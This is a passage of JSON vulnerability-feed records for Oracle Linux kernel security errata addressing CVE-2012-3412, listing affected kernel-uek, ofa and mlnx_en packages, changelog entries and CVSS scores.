(Nikolay Aleksandrov) [845556 845557] {CVE-2012-3412}\n- [s390] zfcp: No automatic port_rescan on events (Hendrik Brueckner) [856316 855131]\n- [fs] xfs: push the AIL from memory reclaim and periodic sync (Dave Chinner) [856686 855139]\n[2.6.32-279.10.1.el6]\n- [mm] hugetlbfs: close race during teardown of hugetlbfs shared page tables (Rafael Aquini) [857334 856325]\n- [mm] hugetlbfs: Correctly detect if page tables have just been shared (Rafael Aquini) [857334 856325]\n- [kernel] sched: fix divide by zero at {thread_group,task}_times (Stanislaw Gruszka) [856703 843771]", "edition": 3, "reporter": "Oracle", "published": "2012-10-16T00:00:00", "title": "kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "modified": "2012-10-16T00:00:00", "id": "ELSA-2012-1366", "href": "http://linux.oracle.com/errata/ELSA-2012-1366.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:42:47", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-200.34.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.34.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.34.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.34.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.34.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.34.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.34.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.34.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-200.34.1.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-200.34.1.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-200.34.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-200.34.1.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-200.34.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.34.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.34.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-200.34.1.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.34.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.34.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.34.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-200.34.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-200.34.1.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.34.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.34.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.34.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.34.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-200.34.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.34.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-200.34.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.34.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-200.34.1.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "[2.6.39-200.34.1]\r\n- [net/sfc] limit number of segments per skb on tx (Maxim Uvarov) [Orabug:\r\n 14769994] {CVE-2012-3412}", "edition": 3, "reporter": "Oracle", "published": "2012-10-19T00:00:00", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "modified": "2012-10-19T00:00:00", "id": "ELSA-2012-2040", "href": "http://linux.oracle.com/errata/ELSA-2012-2040.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:14", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-200.33.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-200.33.1.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-200.33.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.33.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.33.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.33.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.33.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-200.33.1.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.33.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.33.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.33.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.33.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-200.33.1.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.33.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-200.33.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.33.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.33.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-200.33.1.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-200.33.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.33.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-200.33.1.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.33.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.33.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-200.33.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-200.33.1.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.33.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.33.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.33.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.33.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-200.33.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}], "description": "[2.6.39-200.33.1]\r\n- sfc: Replace some literal constants with EFX_PAGE_SIZE/EFX_BUF_SIZE (Ben Hutchings) [Orabug: 14769994]\r\n- CVE-2012-3412 sfc: Fix maximum number of TSO segments and minimum TX queue size (Ben Hutchings) [Orabug: 14769994] {CVE-2012-3412}", "edition": 3, "reporter": "Oracle", "published": "2012-10-18T00:00:00", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "modified": "2012-10-18T00:00:00", "id": "ELSA-2012-2039", "href": "http://linux.oracle.com/errata/ELSA-2012-2039.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:39:09", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.38.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.38.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.38.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.38.1.el6uekdebug-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.38.1.el5uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.38.1.el5uekdebug-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.38.1.el5uek-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-300.38.1.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-300.38.1.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.38.1.el6uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.38.1.el6uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.38.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.38.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-300.38.1.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-300.38.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-300.38.1.el5uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.38.1.el6uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.38.1.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.38.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.38.1.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.38.1.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.38.1.el6uekdebug-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.38.1.el5uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.38.1.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.38.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.38.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.38.1.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.38.1.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.38.1.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.38.1.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.38.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.38.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-300.38.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.38.1.el6uek-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.38.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.38.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.38.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.38.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.38.1.el5uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-300.38.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-300.38.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-300.38.1.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.38.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.38.1.el6uek-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-300.38.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.38.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-300.38.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-300.38.1.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.38.1.el5uekdebug-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-300.38.1.el6uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-300.38.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.38.1.el6uekdebug-1.5.1-4.0.58.x86_64.rpm", 